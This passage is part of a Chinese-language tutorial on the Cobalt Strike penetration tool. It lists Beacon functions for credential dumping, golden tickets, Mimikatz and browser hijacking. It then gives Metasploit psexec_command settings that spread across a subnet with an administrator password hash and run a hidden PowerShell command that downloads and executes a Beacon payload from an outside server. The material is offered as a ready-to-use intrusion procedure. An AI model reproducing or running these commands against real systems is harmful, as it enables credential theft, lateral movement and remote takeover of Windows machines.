内网渗透神器Cobalt Strike,英雄联盟中的无尽之刃( 二 )

AccessDump Hashes #获取hashElevate #提权Golden Ticket #生成黄金票据注入当前会话Make token #凭证转换Run Mimikatz #运行 Mimikatz Spawn As #用其他用户生成Cobalt Strike侦听器ExploreBrowser Pivot #劫持目标浏览器进程Desktop(VNC) #桌面交互File Browser #文件浏览器Net View #命令Net ViewPort Scan #端口扫描Process List #进程列表Screenshot #截图利用MSF模块上线Beacon shell当通过其它方式拿到了目标内网中某台Windows机器的本地管理员明文密码或hash时,可利用Metasploit下
auxiliary/admin/smb/psexec_command模块,直接上线指定目标机器的Beacon shell 。(前提目标即可出网)
先利用CobalStrike生成上线Beacon的powershell 。

内网渗透神器Cobalt Strike,英雄联盟中的无尽之刃

文章插图
 
本地启动Metasploit,挂上代理,设置psexec_command模块参数 。
msf5 > setg Proxies socks4/5:ip:portmsf5 > use auxiliary/admin/smb/psexec_commandmsf5 > set rhosts 192.168.144.0/24msf5 > set threads 10msf5 > set smbuser administratormsf5 > set smbpass aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4 #明文、密文均可msf5 > set command powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://149.28.xx.xx:80/a'))" #上线CS的powershell,目标机存在杀软需考虑msf5 > run
内网渗透神器Cobalt Strike,英雄联盟中的无尽之刃

文章插图
 




推荐阅读